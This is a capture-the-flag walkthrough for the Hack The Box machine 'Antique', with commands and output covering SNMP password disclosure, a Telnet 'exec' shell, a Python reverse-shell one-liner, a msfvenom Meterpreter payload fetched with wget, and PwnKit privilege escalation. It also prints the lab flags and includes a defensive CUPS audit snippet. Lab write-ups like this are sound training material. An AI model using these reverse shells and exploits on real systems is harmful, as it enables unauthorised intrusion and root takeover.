Connect to the HTB server and start the target machine
Target IP: 10.10.11.107
Assigned IP: 10.10.16.22
1.After running an nmap scan on TCP ports we identify port 23 open. If we run another scan on UDP ports, which port do we find open?
Scan the target's TCP and UDP ports with nmap
nmap -p- --min-rate=1500 -T4 -sS -sU -Pn {TARGET_IP}
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -p- --min-rate=1500 -T4 -sS -sU -Pn 10.10.11.107
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-23 08:05 EDT
Warning: 10.10.11.107 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.107
Host is up (0.075s latency).
Not shown: 65534 closed tcp ports (reset), 307 closed udp ports (port-unreach), 65227 open|filtered udp ports (no-response)
PORT STATE SERVICE
23/tcp open telnet
161/udp open snmp
Nmap done: 1 IP address (1 host up) scanned in 347.51 seconds
The scan shows that the target has UDP port 161 open
2.What service is running on the UDP port that we identified in the previous question?
Run nmap's default scripts and service/version detection against port 161
nmap -p 161 -sU -sCV {TARGET_IP}
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -p 161 -sU -sCV 10.10.11.107
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-23 09:12 EDT
Nmap scan report for 10.10.11.107
Host is up (0.079s latency).
PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server (public)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.95 seconds
The SERVICE column of the scan result shows that the service on port 161 is: snmp
3.Let's connect to port 23 using the "telnet" command. What product name does Telnet give us that can help us identify the software that is in use?
Enumerate the target's SNMP service with snmpwalk
snmpwalk -v 1 -c public {TARGET_IP}
┌──(root㉿kali)-[/home/kali/Desktop]
└─# snmpwalk -v 1 -c public 10.10.11.107
iso.3.6.1.2.1 = STRING: "HTB Printer"
It returns "HTB Printer"; next, try connecting to the target's Telnet service
telnet {TARGET_IP}
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# telnet 10.10.11.107
Trying 10.10.11.107...
Connected to 10.10.11.107.
Escape character is '^]'.
HP JetDirect
Password: root
Invalid password
Connection closed by foreign host.
The password attempt fails, but the banner shows the string: HP JetDirect
4.What is the password for the HP JetDirect Telnet service?
Search for this keyword with searchsploit
searchsploit SNMP | grep 'JetDirect'
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit SNMP | grep 'JetDirect'
HP JetDirect Printer - SNMP JetAdmin Device Passw | hardware/remote/22319.txt
Copy this PoC to the current directory
searchsploit -m 22319.txt
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 22319.txt
Exploit: HP JetDirect Printer - SNMP JetAdmin Device Password Disclosure
URL: https://www.exploit-db.com/exploits/22319
Path: /usr/share/exploitdb/exploits/hardware/remote/22319.txt
Codes: CVE-2002-1048, OSVDB-2079
Verified: True
File Type: ASCII text, with very long lines (323)
Copied to: /home/kali/Desktop/temp/22319.txt
View the PoC contents
cat 22319.txt
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat 22319.txt
HP JetDirect J2552A/J2552B/J2591A/J3110A/J3111A/J3113A/J3263A/300.0 X Printer SNMP JetAdmin Device Password Disclosure Vulnerability
source: https://www.securityfocus.com/bid/7001/info
A problem with JetDirect printers could make it possible for a remote user to gain administrative access to the printer.
It has been reported that HP JetDirect printers leak the web JetAdmin device password under some circumstances. By sending an SNMP GET request to a vulnerable printer, the printer will return the hex-encoded device password to the requester. This could allow a remote user to access and change configuration of the printer.
C:\>snmputil get example.printer public .1.3.6.1.4.1.11.2.3.9.1.1.13.0
Use the OID from the PoC to query the target's SNMP service for the password: 1.3.6.1.4.1.11.2.3.9.1.1.13.0
snmpwalk -v 1 -c public {TARGET_IP} .1.3.6.1.4.1.11.2.3.9.1.1.13.0
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# snmpwalk -v 1 -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135
We get a string of encoded data; try removing all of the spaces
504073737730726440313233212131323313917181922232526273031333435373839424349505154575861657475798283869091949598103106111114115119122123126130131134135
Then decode it from hex to ASCII
P@ssw0rd@123!!123q"2Rbs3CSs$4EuWGW(8i IYaA"1&1A5
Taking only the credential part, the password is: P@ssw0rd@123!!123
5.After we successfully authenticate with the Telnet service, which command can we use to execute system commands?
Log in to the target's Telnet service with the password obtained above
telnet {TARGET_IP}
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# telnet 10.10.11.107
Trying 10.10.11.107...
Connected to 10.10.11.107.
Escape character is '^]'.
HP JetDirect
Password: P@ssw0rd@123!!123
After logging in, the prompt tells us to type "?" for help
Please type "?" for HELP
> ?
To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>
Parameter-name Type of value
ip: IP-address in dotted notation
subnet-mask: address in dotted notation (enter 0 for default)
default-gw: address in dotted notation (enter 0 for default)
syslog-svr: address in dotted notation (enter 0 for default)
idle-timeout: seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name: alpha-numeric string (upper case only, 32 chars max)
dhcp-config: 0 to disable, 1 to enable
allow: <ip> [mask] (0 to clear, list to display, 10 max)
addrawport: <TCP port num> (<TCP port num> 3000-9000)
deleterawport: <TCP port num>
listrawport: (No parameter required)
exec: execute system commands (exec id)
exit: quit from telnet session
The help output shows that the command for executing system commands is: exec
6.Submit the flag located on the lp user's desktop.
Try to obtain a reverse shell with python
exec python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{NATIVE_IP}",{NATIVE_PORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.22] from (UNKNOWN) [10.10.11.107] 48948
/bin/sh: 0: can't access tty; job control turned off
$ whoami
lp
Upgrade the TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
View the user flag
cat user.txt
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
lp@antique:~$ ls
ls
telnet.py user.txt
lp@antique:~$ cat user.txt
cat user.txt
4c78d4500a5c9f6281d7c3d9dd3ad3c8
USER_FLAG:4c78d4500a5c9f6281d7c3d9dd3ad3c8
7.The box has a service listening on the 127.0.0.1 interface. What TCP port is it?
View the current network connections
ss -tan
The output shows a service listening locally (127.0.0.1) on port: 631
8.What version of CUPS is running on port 631?
Use curl to look at the service hosted on port 631
curl 127.0.0.1:631
lp@antique:~$ curl 127.0.0.1:631
curl 127.0.0.1:631
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
<TITLE>Home - CUPS 1.6.1</TITLE>
<LINK REL="STYLESHEET" TYPE="text/css" HREF="/cups.css">
<LINK REL="SHORTCUT ICON" HREF="/images/cups-icon.png" TYPE="image/png">
</HEAD>
<BODY>
<TABLE CLASS="page" SUMMARY="{title}">
<TR><TD CLASS="body">
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0" SUMMARY="">
<TR HEIGHT="36">
<TD><A HREF="http://www.cups.org/" TARGET="_blank"><IMG
SRC="/images/left.gif" WIDTH="64" HEIGHT="36" BORDER="0" ALT=""></A></TD>
<TD CLASS="sel"><A HREF="/"> Home </A></TD>
<TD CLASS="unsel"><A HREF="/admin"> Administration </A></TD>
<TD CLASS="unsel"><A HREF="/classes/"> Classes </A></TD>
<TD CLASS="unsel"><A HREF="/help/"> Online Help </A></TD>
<TD CLASS="unsel"><A HREF="/jobs/"> Jobs </A></TD>
<TD CLASS="unsel"><A HREF="/printers/"> Printers </A></TD>
<TD CLASS="unsel" WIDTH="100%"><FORM ACTION="/help/" METHOD="GET"><INPUT
TYPE="SEARCH" NAME="QUERY" SIZE="20" PLACEHOLDER="Search Help"
AUTOSAVE="org.cups.help" RESULTS="20"></FORM></TD>
<TD><IMG SRC="/images/right.gif" WIDTH="4" HEIGHT="36" ALT=""></TD>
</TR>
</TABLE><TABLE CLASS="indent" SUMMARY="">
<TR><TD STYLE="padding-right: 20px;"><H1>CUPS 1.6.1</H1>
<P>CUPS is the standards-based, open source printing system developed by
<A HREF="http://www.apple.com/">Apple Inc.</A> for OS<SUP>®</SUP> X and
other UNIX<SUP>®</SUP>-like operating systems.</P></TD>
<TD><A HREF="http://www.cups.org/"><IMG SRC="images/cups-icon.png" WIDTH="128"
HEIGHT="128" ALT="CUPS"></A></TD>
</TR>
</TABLE><TABLE CLASS="indent" SUMMARY="">
<TR><TD VALIGN="top" STYLE="border-right: dotted thin #cccccc; padding-right: 20px;"><H2>CUPS for Users</H2>
<P><A HREF="help/overview.html">Overview of CUPS</A></P>
<P><A HREF="help/options.html">Command-Line Printing and Options</A></P>
<P><A HREF="help/whatsnew.html">What's New in CUPS 1.6</A></P>
<P><A HREF="http://www.cups.org/newsgroups.php?gcups.general">User Forum</A></P>
</TD><TD VALIGN="top" STYLE="border-right: dotted thin #cccccc; padding-left: 20px; padding-right: 20px;">
<H2>CUPS for Administrators</H2>
<P><A HREF="admin">Adding Printers and Classes</A></P>
<P><A HREF="help/policies.html">Managing Operation Policies</A></P>
<P><A HREF="help/accounting.html">Printer Accounting Basics</A></P>
<P><A HREF="help/security.html">Server Security</A></P>
<P><A HREF="help/kerberos.html">Using Kerberos Authentication</A></P>
<P><A HREF="help/network.html">Using Network Printers</A></P>
<P><A HREF="help/ref-cupsd-conf.html">cupsd.conf Reference</A></P>
<P><A HREF="http://www.cups.org/ppd.php">Find Printer Drivers</A></P>
</TD><TD VALIGN="top" STYLE="padding-left: 20px;">
<H2>CUPS for Developers</H2>
<P><A HREF="help/api-overview.html">Introduction to CUPS Programming</A></P>
<P><A HREF="help/api-cups.html">CUPS API</A></P>
<P><A HREF="help/api-filter.html">Filter and Backend Programming</A></P>
<P><A HREF="help/api-httpipp.html">HTTP and IPP APIs</A></P>
<P><A HREF="help/api-ppd.html">PPD API</A></P>
<P><A HREF="help/api-raster.html">Raster API</A></P>
<P><A HREF="help/ref-ppdcfile.html">PPD Compiler Driver Information File Reference</A></P>
<P><A HREF="http://www.cups.org/newsgroups.php?gcups.development">Developer Forum</A></P>
</TD></TR>
</TABLE></TD></TR>
<TR><TD> </TD></TR>
<TR><TD CLASS="trailer">CUPS and the CUPS logo are trademarks of
<A HREF="http://www.apple.com">Apple Inc.</A> CUPS is copyright 2007-2012 Apple
Inc. All rights reserved.</TD></TR>
</TABLE>
</BODY>
</HTML>
The <TITLE> element of the response shows that the CUPS version hosted on this port is: 1.6.1
9.What is the 2012 CVE associated with a local file read vulnerability in CUPS 1.6.1?
Start Metasploit
msfconsole
Search for CUPS 1.6.1
search CUPS 1.6.1
Use this module
use post/multi/escalate/cups_root_file_read
Show the module info
info
msf6 post(multi/escalate/cups_root_file_read) > info
Name: CUPS 1.6.1 Root File Read
Module: post/multi/escalate/cups_root_file_read
Platform: Linux, OSX
Arch:
Rank: Normal
Disclosed: 2012-11-20
Provided by:
Jann Horn
joev <joev@metasploit.com>
Compatible session types:
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ERROR_LOG /var/log/cups/error_log yes The original path to the CUPS error log
FILE /etc/shadow yes The file to steal.
SESSION yes The session to run this module on
Description:
This module exploits a vulnerability in CUPS < 1.6.2, an open source printing system.
CUPS allows members of the lpadmin group to make changes to the cupsd.conf
configuration, which can specify an Error Log path. When the user visits the
Error Log page in the web interface, the cupsd daemon (running with setuid root)
reads the Error Log path and echoes it as plaintext.
This module is known to work on Mac OS X < 10.8.4 and Ubuntu Desktop <= 12.0.4
as long as the session is in the lpadmin group.
Warning: if the user has set up a custom path to the CUPS error log,
this module might fail to reset that path correctly. You can specify
a custom error log path with the ERROR_LOG datastore option.
References:
https://nvd.nist.gov/vuln/detail/CVE-2012-5519
OSVDB (87635)
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692791
View the full module info with the info -d command.
The module info shows that it is based on the vulnerability: CVE-2012-5519
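As an added defender-side check that is not part of the original writeup: the module description says the bug affects CUPS below 1.6.2 and works by redirecting the ErrorLog path and reading it back through the web interface, so an audit can take the version from the web UI title (as the previous question did) and flag an ErrorLog that points outside /var/log/cups. The cupsd.conf fragment below is constructed, and treating "syslog" as the only legitimate non-file value is an assumption.

```python
import re
from typing import Optional, Tuple

# Constructed sample of the <TITLE> the writeup found at http://127.0.0.1:631.
SAMPLE_HTML = "<HEAD><TITLE>Home - CUPS 1.6.1</TITLE></HEAD>"

# Constructed cupsd.conf fragment (hypothetical content, not taken from the box).
SAMPLE_CONF = """LogLevel warn
ErrorLog /etc/shadow
Listen localhost:631
"""

FIXED_VERSION = (1, 6, 2)          # module description: affects CUPS < 1.6.2
DEFAULT_LOG_DIR = "/var/log/cups"  # default location of the ERROR_LOG option


def cups_version(html: str) -> Optional[Tuple[int, ...]]:
    """Pull the version out of the CUPS web UI title, e.g. 'Home - CUPS 1.6.1'."""
    m = re.search(r"<TITLE>[^<]*CUPS\s+(\d+(?:\.\d+)+)\s*</TITLE>", html, re.IGNORECASE)
    if not m:
        return None
    return tuple(int(part) for part in m.group(1).split("."))


def version_affected(version: Optional[Tuple[int, ...]]) -> bool:
    """True when the detected version is older than the 1.6.2 fix."""
    return version is not None and version < FIXED_VERSION


def error_log_outside_default(conf: str) -> Optional[str]:
    """Return the ErrorLog path if it has been pointed outside /var/log/cups.

    CVE-2012-5519 is exploited by setting ErrorLog to an arbitrary file and
    viewing the error log page, so a redirected ErrorLog is the thing to look
    for. 'syslog' is accepted as a legitimate non-file value (assumption).
    """
    for line in conf.splitlines():
        m = re.match(r"\s*ErrorLog\s+(\S+)", line)
        if not m:
            continue
        path = m.group(1)
        if path != "syslog" and not path.startswith(DEFAULT_LOG_DIR + "/"):
            return path
    return None
```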
10.Submit the flag located in root's home directory.
Check the target's system information
Check the OS type and architecture
uname
uname -m
lp@antique:~$ uname
uname
Linux
lp@antique:~$ uname -m
uname -m
x86_64
Based on the system information, generate a matching Meterpreter payload
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={NATIVE_IP} LPORT=1234 -f elf > shell.elf
┌──(root㉿kali)-[/home/kali/Desktop]
└─# msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.16.22 LPORT=1234 -f elf > shell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
Start an HTTP server with python to serve the payload to the target
python -m http.server 7777
Download the payload on the target with wget
wget http://{NATIVE_IP}:7777/shell.elf -O shell.elf
lp@antique:~$ wget http://10.10.16.22:7777/shell.elf -O shell.elf
wget http://10.10.16.22:7777/shell.elf -O shell.elf
--2024-10-24 04:52:16-- http://10.10.16.22:7777/shell.elf
Connecting to 10.10.16.22:7777... connected.
HTTP request sent, awaiting response... 200 OK
Length: 250 [application/octet-stream]
Saving to: ‘shell.elf’
shell.elf 100%[===================>] 250 --.-KB/s in 0s
2024-10-24 04:52:17 (33.7 MB/s) - ‘shell.elf’ saved [250/250]
In MSF, switch to the handler module: exploit/multi/handler
use exploit/multi/handler
Set the parameters: LHOST, LPORT, PAYLOAD
msf6 exploit(multi/handler) > set LHOST 10.10.16.22
LHOST => 10.10.16.22
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
Type exploit or run to start listening, then execute shell.elf on the target
lp@antique:~$ chmod +x shell.elf
chmod +x shell.elf
lp@antique:~$ ./shell.elf
./shell.elf
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.22:1234
[*] Sending stage (3045380 bytes) to 10.10.11.107
[*] Meterpreter session 2 opened (10.10.16.22:1234 -> 10.10.11.107:50326) at 2024-10-24
Background the Meterpreter session
background
meterpreter > background
[*] Backgrounding session 2...
Switch to the local exploit suggester module (post/multi/recon/local_exploit_suggester) and scan
use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 2
SESSION => 2
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.11.107 - Collecting local exploits for x64/linux...
[*] 10.10.11.107 - 198 exploit checks are being tried...
[+] 10.10.11.107 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 10.10.11.107 - exploit/linux/local/cve_2022_0847_dirtypipe: The target appears to be vulnerable. Linux kernel version found: 5.13.0
[+] 10.10.11.107 - exploit/linux/local/cve_2022_0995_watch_queue: The target appears to be vulnerable.
[+] 10.10.11.107 - exploit/linux/local/cve_2022_1043_io_uring_priv_esc: The target is vulnerable. > 1 CPU required, detected: 2
[+] 10.10.11.107 - exploit/linux/local/cve_2023_0386_overlayfs_priv_esc: The target appears to be vulnerable. Linux kernel version found: 5.13.0
[+] 10.10.11.107 - exploit/linux/local/netfilter_nft_set_elem_init_privesc: The target appears to be vulnerable.
[+] 10.10.11.107 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 10.10.11.107 - exploit/linux/local/su_login: The target appears to be vulnerable.
[+] 10.10.11.107 - exploit/linux/local/sudo_baron_samedit: The service is running, but could not be validated. sudo 1.8.31 may be a vulnerable build.
[+] 10.10.11.107 - exploit/linux/local/sudoedit_bypass_priv_esc: The target appears to be vulnerable. Sudo 1.8.31.pre.1ubuntu1.2 is vulnerable, but unable to determine editable file. OS can NOT be exploited by this module
[*] Running check method for exploit 70 / 70
[*] 10.10.11.107 - Valid modules for session 2:
Try the first usable module directly: exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
Parameters to set: LHOST, LPORT, SESSION, PAYLOAD
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 10.10.16.22
LHOST => 10.10.16.22
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 7878
LPORT => 7878
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 2
SESSION => 2
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
PAYLOAD => linux/x64/meterpreter/reverse_tcp
Type run or exploit to start the exploit
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > exploit
[*] Started reverse TCP handler on 10.10.16.22:7878
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.ybwjexbl
[+] The target is vulnerable.
[*] Writing '/tmp/.sflzlca/fwxcodr/fwxcodr.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.sflzlca
[*] Sending stage (3045380 bytes) to 10.10.11.107
[+] Deleted /tmp/.sflzlca/fwxcodr/fwxcodr.so
[+] Deleted /tmp/.sflzlca/.arusgsxpspiz
[+] Deleted /tmp/.sflzlca
[*] Meterpreter session 3 opened (10.10.16.22:7878 -> 10.10.11.107:58106) at 2024-10-24 01:15:40 -0400
meterpreter > getuid
Server username: root
We now have root privileges
Drop to a shell
shell
Upgrade the TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
Locate the root flag
find / -name 'root.txt'
View the root flag
cat /root/root.txt
meterpreter > shell
Process 1982 created.
Channel 1 created.
python3 -c 'import pty; pty.spawn("/bin/bash")'
root@antique:/# find / -name 'root.txt'
find / -name 'root.txt'
/root/root.txt
root@antique:/# cat /root/root.txt
cat /root/root.txt
5821059e12bbea7d6e680222d31cdd65